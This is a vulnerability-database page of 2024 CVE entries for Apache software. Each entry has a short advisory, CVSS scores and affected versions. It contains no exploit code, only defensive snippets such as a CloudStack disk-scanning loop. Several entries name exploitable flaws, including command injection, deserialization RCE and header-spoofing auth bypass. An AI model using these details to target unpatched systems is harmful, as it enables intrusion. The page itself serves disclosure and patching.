security@apache.org 5.7 MEDIUM CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:L/A:L 0.9 4.7

Products Affected

Vendor Product Version
apache cloudstack *
CVE-2024-45462

The logout operation in the CloudStack web interface does not expire the user session completely which is valid until expiry by time or restart of the backend service. An attacker that has access to a user's browser can use an unexpired session to gain access to resources owned by the logged out user account. This issue affects Apache CloudStack from 4.15.1.0 through 4.18.2.3; and from 4.19.0.0 through 4.19.1.1. Users are recommended to upgrade to Apache CloudStack 4.18.2.4 or 4.19.1.2, or later, which addresses this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 6.3 MEDIUM CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N 1.0 5.2

Products Affected

Vendor Product Version
apache cloudstack *
CVE-2024-45477

Apache NiFi 1.10.0 through 1.27.0 and 2.0.0-M1 through 2.0.0-M3 support a description field for Parameters in a Parameter Context configuration that is vulnerable to cross-site scripting. An authenticated user, authorized to configure a Parameter Context, can enter arbitrary JavaScript code, which the client browser will execute within the session context of the authenticated user. Upgrading to Apache NiFi 1.28.0 or 2.0.0-M4 is the recommended mitigation.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 4.6 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N 2.1 2.5

Products Affected

Vendor Product Version
apache nifi 2.0.0
apache nifi *
CVE-2024-45478

Stored XSS vulnerability in Edit Service Page of Apache Ranger UI in Apache Ranger Version 2.4.0. Users are recommended to upgrade to version Apache Ranger 2.5.0, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 4.8 MEDIUM CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N 1.7 2.7

Products Affected

Vendor Product Version
apache ranger *
CVE-2024-45479

SSRF vulnerability in Edit Service Page of Apache Ranger UI in Apache Ranger Version 2.4.0. Users are recommended to upgrade to version Apache Ranger 2.5.0, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 3.9 5.2

Products Affected

Vendor Product Version
apache ranger *
CVE-2024-45498

Example DAG: example_inlet_event_extra.py shipped with Apache Airflow version 2.10.0 has a vulnerability that allows an authenticated attacker with only DAG trigger permission to execute arbitrary commands. If you used that example as the base of your DAGs - please review if you have not copied the dangerous example; see https://github.com/apache/airflow/pull/41873  for more information. We recommend against exposing the example DAGs in your deployment. If you must expose the example DAGs, upgrade Airflow to version 2.10.1 or later.

Products Affected

Vendor Product Version
apache airflow 2.10.0
CVE-2024-45505

Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Apache HertzBeat (incubating). This vulnerability can only be exploited by authorized attackers. This issue affects Apache HertzBeat (incubating): before 1.6.1. Users are recommended to upgrade to version 1.6.1, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache hertzbeat *
CVE-2024-45507

Server-Side Request Forgery (SSRF), Improper Control of Generation of Code ('Code Injection') vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 18.12.16. Users are recommended to upgrade to version 18.12.16, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2024-45626

Apache James server JMAP HTML to text plain implementation in versions below 3.8.2 and 3.7.6 is subject to unbounded memory consumption that can result in a denial of service. Users are recommended to upgrade to version 3.7.6 and 3.8.2, which fix this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6
security@apache.org 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H 2.8 3.6

Products Affected

Vendor Product Version
apache james_server *
CVE-2024-45627

In Apache Linkis <1.7.0, due to the lack of effective filtering of parameters, an attacker configuring malicious Mysql JDBC parameters in the DataSource Manager Module will allow the attacker to read arbitrary files from the Linkis server. Therefore, the parameters in the Mysql JDBC URL should be blacklisted. This attack requires the attacker to obtain an authorized account from Linkis before it can be carried out. Versions of Apache Linkis < 1.7.0 will be affected. We recommend users upgrade the version of Linkis to version 1.7.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.9 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L 2.5 3.4

Products Affected

Vendor Product Version
apache linkis *
CVE-2024-45693

Users logged into the Apache CloudStack's web interface can be tricked to submit malicious CSRF requests due to missing validation of the origin of the requests. This can allow an attacker to gain privileges and access to resources of the authenticated users and may lead to account takeover, disruption, exposure of sensitive data and compromise integrity of the resources owned by the user account that are managed by the platform. This issue affects Apache CloudStack from 4.15.1.0 through 4.18.2.3 and 4.19.0.0 through 4.19.1.1 Users are recommended to upgrade to Apache CloudStack 4.18.2.4 or 4.19.1.2, or later, which addresses this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 8.0 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N 1.6 5.8

Products Affected

Vendor Product Version
apache cloudstack *
CVE-2024-45719

Inadequate Encryption Strength vulnerability in Apache Answer. This issue affects Apache Answer: through 1.4.0. The ids generated using the UUID v1 version are to some extent not secure enough. It can cause the generated token to be predictable. Users are recommended to upgrade to version 1.4.1, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 2.6 LOW CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:L/I:N/A:N 1.0 1.4

Products Affected

Vendor Product Version
apache answer *
CVE-2024-45720

On Windows platforms, a "best fit" character encoding conversion of command line arguments to Subversion's executables (e.g., svn.exe, etc.) may lead to unexpected command line argument interpretation, including argument injection and execution of other programs, if a specially crafted command line argument string is processed. All versions of Subversion up to and including Subversion 1.14.3 are affected on Windows platforms only. Users are recommended to upgrade to version Subversion 1.14.4, which fixes this issue. Subversion is not affected on UNIX-like platforms.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 8.2 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H 1.5 6.0

Products Affected

Vendor Product Version
apache subversion *
CVE-2024-45772

Deserialization of Untrusted Data vulnerability in Apache Lucene Replicator. This issue affects Apache Lucene's replicator module: from 4.4.0 before 9.12.0. The deprecated org.apache.lucene.replicator.http package is affected. The org.apache.lucene.replicator.nrt package is not affected. Users are recommended to upgrade to version 9.12.0, which fixes the issue. The deserialization can only be triggered if users actively deploy an network-accessible implementation and a corresponding client using a HTTP library that uses the API (e.g., a custom servlet and HTTPClient). Java serialization filters (such as -Djdk.serialFilter='!*' on the commandline) can mitigate the issue on vulnerable versions without impacting functionality.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 5.1 MEDIUM CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:L 1.0 3.7

Products Affected

Vendor Product Version
apache lucene *
apache lucene_replicator *
CVE-2024-45784

Apache Airflow versions before 2.10.3 contain a vulnerability that could expose sensitive configuration variables in task logs. This vulnerability allows DAG authors to unintentionally or intentionally log sensitive configuration variables. Unauthorized users could access these logs, potentially exposing critical data that could be exploited to compromise the security of the Airflow deployment. In version 2.10.3, secrets are now masked in task logs to prevent sensitive configuration variables from being exposed in the logging output. Users should upgrade to Airflow 2.10.3 or the latest version to eliminate this vulnerability. If you suspect that DAG authors could have logged the secret values to the logs and that your logs are not additionally protected, it is also recommended that you update those secrets.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache airflow *
CVE-2024-45791

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache HertzBeat. This issue affects Apache HertzBeat: before 1.6.1. Users are recommended to upgrade to version 1.6.1, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache hertzbeat *
CVE-2024-46544

Incorrect Default Permissions vulnerability in Apache Tomcat Connectors allows local users to view and modify shared memory containing mod_jk configuration which may lead to information disclosure and/or denial of service. This issue affects Apache Tomcat Connectors: from 1.2.9-beta through 1.2.49. Only mod_jk on Unix like systems is affected. Neither the ISAPI redirector nor mod_jk on Windows is affected. Users are recommended to upgrade to version 1.2.50, which fixes the issue.

Products Affected

Vendor Product Version
apache tomcat_connectors *
debian debian_linux 11.0
CVE-2024-46901

Insufficient validation of filenames against control characters in Apache Subversion repositories served via mod_dav_svn allows authenticated users with commit access to commit a corrupted revision, leading to disruption for users of the repository. All versions of Subversion up to and including Subversion 1.14.4 are affected if serving repositories via mod_dav_svn. Users are recommended to upgrade to version 1.14.5, which fixes this issue. Repositories served via other access methods are not affected.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 3.1 LOW CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L 1.6 1.4

Products Affected

Vendor Product Version
apache subversion *
debian debian_linux 11.0
CVE-2024-46910

An authenticated user can perform XSS and potentially impersonate another user. This issue affects Apache Atlas versions 2.3.0 and earlier. Users are recommended to upgrade to version 2.4.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.1 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N 2.8 4.2

Products Affected

Vendor Product Version
apache atlas *
CVE-2024-46911

Cross-site Resource Forgery (CSRF), Privilege escalation vulnerability in Apache Roller. On multi-blog/user Roller websites, by default weblog owners are trusted to publish arbitrary weblog content and this combined with a deficiency in Roller's CSRF protections allowed an escalation of privileges attack. This issue affects Apache Roller before 6.1.4. Roller users who run multi-blog/user Roller websites are recommended to upgrade to version 6.1.4, which fixes the issue. Roller 6.1.4 release announcement:  https://lists.apache.org/thread/3c3f6rwqptyw6wdc95654fq5vlosqdpw

Products Affected

Vendor Product Version
apache roller *
CVE-2024-47197

Exposure of Sensitive Information to an Unauthorized Actor, Insecure Storage of Sensitive Information vulnerability in Maven Archetype Plugin. This issue affects Maven Archetype Plugin: from 3.2.1 before 3.3.0. Users are recommended to upgrade to version 3.3.0, which fixes the issue. Archetype integration testing creates a file called ./target/classes/archetype-it/archetype-settings.xml This file contains all the content from the users ~/.m2/settings.xml file, which often contains information they do not want to publish. We expect that on many developer machines, this also contains credentials. When the user runs mvn verify again (without a mvn clean), this file becomes part of the final artifact. If a developer were to publish this into Maven Central or any other remote repository (whether as a release or a snapshot) their credentials would be published without them knowing.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache maven_archetype 3.2.1
CVE-2024-47208

Server-Side Request Forgery (SSRF), Improper Control of Generation of Code ('Code Injection') vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 18.12.17. Users are recommended to upgrade to version 18.12.17, which fixes the issue.

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2024-47248

Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') vulnerability in Apache NimBLE. Specially crafted MESH message could result in memory corruption when non-default build configuration is used. This issue affects Apache NimBLE: through 1.7.0. Users are recommended to upgrade to version 1.8.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.3 MEDIUM CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L 2.8 3.4

Products Affected

Vendor Product Version
apache nimble *
CVE-2024-47249

Improper Validation of Array Index vulnerability in Apache NimBLE. Lack of input validation for HCI events from controller could result in out-of-bound memory corruption and crash. This issue requires broken or bogus Bluetooth controller and thus severity is considered low. This issue affects Apache NimBLE: through 1.7.0. Users are recommended to upgrade to version 1.8.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.0 MEDIUM CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L 1.6 3.4

Products Affected

Vendor Product Version
apache nimble *
CVE-2024-47250

Out-of-bounds Read vulnerability in Apache NimBLE. Missing proper validation of HCI advertising report could lead to out-of-bound access when parsing HCI event and thus bogus GAP 'device found' events being sent. This issue requires broken or bogus Bluetooth controller and thus severity is considered low. This issue affects Apache NimBLE: through 1.7.0. Users are recommended to upgrade to version 1.8.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.0 MEDIUM CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L 1.6 3.4

Products Affected

Vendor Product Version
apache nimble *
CVE-2024-47252

Insufficient escaping of user-supplied data in mod_ssl in Apache HTTP Server 2.4.63 and earlier allows an untrusted SSL/TLS client to insert escape characters into log files in some configurations. In a logging configuration where CustomLog is used with "%{varname}x" or "%{varname}c" to log variables provided by mod_ssl such as SSL_TLS_SNI, no escaping is performed by either mod_log_config or mod_ssl and unsanitized data provided by the client may appear in log files.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache http_server *
CVE-2024-47552

Deserialization of Untrusted Data vulnerability in Apache Seata (incubating). This issue affects Apache Seata (incubating): from 2.0.0 before 2.2.0. Severity Justification: The Apache Seata security team assesses the severity of this vulnerability as "Low" due to stringent real-world mitigating factors. First, the vulnerability is strictly isolated to the Raft cluster mode, an optional and non-default feature introduced in v2.0.0, while most users rely on the unaffected traditional architecture. Second, Seata is an internal middleware; communication between TC and RM/TM occurs entirely within trusted internal networks. An attacker would require prior, unauthorized access to the Intranet to exploit this, making external exploitation highly improbable. Users are recommended to upgrade to version 2.2.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache seata *
CVE-2024-47554

Uncontrolled Resource Consumption vulnerability in Apache Commons IO. The org.apache.commons.io.input.XmlStreamReader class may excessively consume CPU resources when processing maliciously crafted input. This issue affects Apache Commons IO: from 2.0 before 2.14.0. Users are recommended to upgrade to version 2.14.0 or later, which fixes the issue.

Products Affected

Vendor Product Version
netapp active_iq_unified_manager -
netapp santricity_storage_plugin -
netapp e-series_santricity_web_services_proxy -
netapp snapcenter -
netapp ontap_tools 10
apache commons_io *
netapp e-series_santricity_unified_manager -
netapp bluexp -
netapp ontap_tools 9
CVE-2024-47561

Schema parsing in the Java SDK of Apache Avro 1.11.3 and previous versions allows bad actors to execute arbitrary code. Users are recommended to upgrade to version 1.11.4  or 1.12.0, which fix this issue.

Products Affected

Vendor Product Version
netapp active_iq_unified_manager -
apache avro *
netapp brocade_san_navigator -
CVE-2024-48019

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), Files or Directories Accessible to External Parties vulnerability in Apache Doris. Application administrators can read arbitrary files from the server filesystem through path traversal. Users are recommended to upgrade to version 2.1.8, 3.0.3 or later, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N 2.8 2.5

Products Affected

Vendor Product Version
apache doris *
CVE-2024-48962

Improper Control of Generation of Code ('Code Injection'), Cross-Site Request Forgery (CSRF), : Improper Neutralization of Special Elements Used in a Template Engine vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 18.12.17. Users are recommended to upgrade to version 18.12.17, which fixes the issue.

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2024-48988

SQL Injection vulnerability in Apache StreamPark. This issue affects Apache StreamPark: from 2.1.4 before 2.1.6. Users are recommended to upgrade to version 2.1.6, which fixes the issue. This vulnerability is present only in the distribution package (SpringBoot platform) and does not involve Maven artifacts. It can only be exploited after a user has successfully logged into the platform (implying that the attacker would first need to compromise the login authentication). As a result, the associated risk is considered relatively low.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.6 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L 2.8 4.7

Products Affected

Vendor Product Version
apache streampark *
CVE-2024-50305

Valid Host header field can cause Apache Traffic Server to crash on some platforms. This issue affects Apache Traffic Server: from 9.2.0 through 9.2.5. Users are recommended to upgrade to version 9.2.6, which fixes the issue, or 10.0.2, which does not have the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2024-50306

Unchecked return value can allow Apache Traffic Server to retain privileges on startup. This issue affects Apache Traffic Server: from 9.2.0 through 9.2.5, from 10.0.0 through 10.0.1. Users are recommended to upgrade to version 9.2.6 or 10.0.2, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H 3.9 5.2

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2024-50378

Airflow versions before 2.10.3 have a vulnerability that allows authenticated users with audit log access to see sensitive values in audit logs which they should not see. When sensitive variables were set via airflow CLI, values of those variables appeared in the audit log and were stored unencrypted in the Airflow database. While this risk is limited to users with audit log access, it is recommended to upgrade to Airflow 2.10.3 or a later version, which addresses this issue. Users who previously used the CLI to set secret variables should manually delete entries with those variables from the log table.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 4.9 MEDIUM CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N 1.2 3.6

Products Affected

Vendor Product Version
apache airflow *
CVE-2024-50379

Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability during JSP compilation in Apache Tomcat permits an RCE on case insensitive file systems when the default servlet is enabled for write (non-default configuration). This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.1, from 10.1.0-M1 through 10.1.33, from 9.0.0.M1 through 9.0.97. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 though 8.5.100. Other, older, EOL versions may also be affected. Users are recommended to upgrade to version 11.0.2, 10.1.34 or 9.0.98, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache tomcat *
netapp bootstrap_os -
CVE-2024-50386

Account users in Apache CloudStack by default are allowed to register templates to be downloaded directly to the primary storage for deploying instances. Due to missing validation checks for KVM-compatible templates in CloudStack 4.0.0 through 4.18.2.4 and 4.19.0.0 through 4.19.1.2, an attacker that can register templates, can use them to deploy malicious instances on KVM-based environments and exploit this to gain access to the host filesystems that could result in the compromise of resource integrity and confidentiality, data loss, denial of service, and availability of KVM-based infrastructure managed by CloudStack. Users are recommended to upgrade to Apache CloudStack 4.18.2.5 or 4.19.1.3, or later, which addresses this issue. Additionally, all user-registered KVM-compatible templates can be scanned and checked that they are flat files that should not be using any additional or unnecessary features. For example, operators can run the following command on their file-based primary storage(s) and inspect the output. An empty output for the disk being validated means it has no references to the host filesystems; on the other hand, if the output for the disk being validated is not empty, it might indicate a compromised disk. However, bear in mind that (i) volumes created from templates will have references for the templates at first and (ii) volumes can be consolidated while migrating, losing their references to the templates. Therefore, the command execution for the primary storages can show both false positives and false negatives. for file in $(find /path/to/storage/ -type f -regex [a-f0-9\-]*.*); do echo "Retrieving file [$file] info. If the output is not empty, that might indicate a compromised disk; check it carefully."; qemu-img info -U $file | grep file: ; printf "\n\n"; done For checking the whole template/volume features of each disk, operators can run the following command: for file in $(find /path/to/storage/ -type f -regex [a-f0-9\-]*.*); do echo "Retrieving file [$file] info."; qemu-img info -U $file; printf "\n\n"; done

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 8.5 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H 1.8 6.0

Products Affected

Vendor Product Version
apache cloudstack *
CVE-2024-51504

When using IPAuthenticationProvider in ZooKeeper Admin Server there is a possibility of Authentication Bypass by Spoofing -- this only impacts IP based authentication implemented in ZooKeeper Admin Server. Default configuration of client's IP address detection in IPAuthenticationProvider, which uses HTTP request headers, is weak and allows an attacker to bypass authentication via spoofing client's IP address in request headers. Default configuration honors X-Forwarded-For HTTP header to read client's IP address. X-Forwarded-For request header is mainly used by proxy servers to identify the client and can be easily spoofed by an attacker pretending that the request comes from a different IP address. Admin Server commands, such as snapshot and restore arbitrarily can be executed on successful exploitation which could potentially lead to information leakage or service availability issues. Users are recommended to upgrade to version 3.9.3, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H 3.9 5.2

Products Affected

Vendor Product Version
apache zookeeper *
CVE-2024-51569

Out-of-bounds Read vulnerability in Apache NimBLE. Missing proper validation of HCI Number Of Completed Packets could lead to out-of-bound access when parsing HCI event and invalid read from HCI transport memory. This issue requires broken or bogus Bluetooth controller and thus severity is considered low. This issue affects Apache NimBLE: through 1.7.0. Users are recommended to upgrade to version 1.8.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache nimble *
CVE-2024-51775

Missing Origin Validation in WebSockets vulnerability in Apache Zeppelin. The attacker could access the Zeppelin server from another origin without any restriction, and get internal information about paragraphs.  This issue affects Apache Zeppelin: from 0.11.1 before 0.12.0. Users are recommended to upgrade to version 0.12.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache zeppelin *
CVE-2024-51941

A remote code injection vulnerability exists in the Ambari Metrics and AMS Alerts feature, allowing authenticated users to inject and execute arbitrary code. The vulnerability occurs when processing alert definitions, where malicious input can be injected into the alert script execution path. An attacker with authenticated access can exploit this vulnerability to execute arbitrary commands on the server. The issue has been fixed in the latest versions of Ambari.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache ambari *
CVE-2024-52012

Relative Path Traversal vulnerability in Apache Solr. Solr instances running on Windows are vulnerable to arbitrary filepath write-access, due to a lack of input-sanitation in the "configset upload" API.  Commonly known as a "zipslip", maliciously constructed ZIP files can use relative filepaths to write data to unanticipated parts of the filesystem.   This issue affects Apache Solr: from 6.6 through 9.7.0. Users are recommended to upgrade to version 9.8.0, which fixes the issue.  Users unable to upgrade may also safely prevent the issue by using Solr's "Rule-Based Authentication Plugin" to restrict access to the configset upload API, so that it can only be accessed by a trusted set of administrators/users.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N 2.8 2.5

Products Affected

Vendor Product Version
apache solr *
CVE-2024-52046

The ObjectSerializationDecoder in Apache MINA uses Java’s native deserialization protocol to process incoming serialized data but lacks the necessary security checks and defenses. This vulnerability allows attackers to exploit the deserialization process by sending specially crafted malicious serialized data, potentially leading to remote code execution (RCE) attacks. This issue affects MINA core versions 2.0.X, 2.1.X and 2.2.X, and will be fixed by the releases 2.0.27, 2.1.10 and 2.2.4. It's also important to note that an application using MINA core library will only be affected if the IoBuffer#getObject() method is called, and this specific method is potentially called when adding a ProtocolCodecFilter instance using the ObjectSerializationCodecFactory class in the filter chain. If your application is specifically using those classes, you have to upgrade to the latest version of MINA core library. Upgrading will  not be enough: you also need to explicitly allow the classes the decoder will accept in the ObjectSerializationDecoder instance, using one of the three new methods: /**      * Accept class names where the supplied ClassNameMatcher matches for * deserialization, unless they are otherwise rejected. * * @param classNameMatcher the matcher to use */ public void accept(ClassNameMatcher classNameMatcher) /** * Accept class names that match the supplied pattern for * deserialization, unless they are otherwise rejected. * * @param pattern standard Java regexp */ public void accept(Pattern pattern) /** * Accept the wildcard specified classes for deserialization, * unless they are otherwise rejected. * * @param patterns Wildcard file name patterns as defined by * {@link org.apache.commons.io.FilenameUtils#wildcardMatch(String, String) FilenameUtils.wildcardMatch} */ public void accept(String... patterns) By default, the decoder will reject *all* classes that will be present in the incoming data. Note: The FtpServer, SSHd and Vysper sub-project are not affected by this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache mina *
CVE-2024-52067

Apache NiFi 1.16.0 through 1.28.0 and 2.0.0-M1 through 2.0.0-M4 include optional debug logging of Parameter Context values during the flow synchronization process. An authorized administrator with access to change logging levels could enable debug logging for framework flow synchronization, causing the application to write Parameter names and values to the application log. Parameter Context values may contain sensitive information depending on application flow configuration. Deployments of Apache NiFi with the default Logback configuration do not log Parameter Context values. Upgrading to Apache NiFi 2.0.0 or 1.28.1 is the recommendation mitigation, eliminating Parameter value logging from the flow synchronization process regardless of the Logback configuration.

Products Affected

Vendor Product Version
apache nifi 2.0.0
apache nifi *
CVE-2024-52279

Improper Input Validation vulnerability in Apache Zeppelin. The fix for JDBC URL validation in CVE-2024-31864 did not account for URL encoded input. This issue affects Apache Zeppelin: from 0.11.1 before 0.12.0. Users are recommended to upgrade to version 0.12.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N 3.9 1.4
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache zeppelin *
CVE-2024-52316

Unchecked Error Condition vulnerability in Apache Tomcat. If Tomcat is configured to use a custom Jakarta Authentication (formerly JASPIC) ServerAuthContext component which may throw an exception during the authentication process without explicitly setting an HTTP status to indicate failure, the authentication may not fail, allowing the user to bypass the authentication process. There are no known Jakarta Authentication components that behave in this way. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M26, from 10.1.0-M1 through 10.1.30, from 9.0.0-M1 through 9.0.95. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 though 8.5.100. Other EOL versions may also be affected. Users are recommended to upgrade to version 11.0.0, 10.1.31 or 9.0.96, which fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 11.0.0
debian debian_linux 11.0
CVE-2024-52317

Incorrect object re-cycling and re-use vulnerability in Apache Tomcat. Incorrect recycling of the request and response used by HTTP/2 requests could lead to request and/or response mix-up between users. This issue affects Apache Tomcat: from 11.0.0-M23 through 11.0.0-M26, from 10.1.27 through 10.1.30, from 9.0.92 through 9.0.95. Users are recommended to upgrade to version 11.0.0, 10.1.31 or 9.0.96, which fixes the issue.

CVSS 3.x

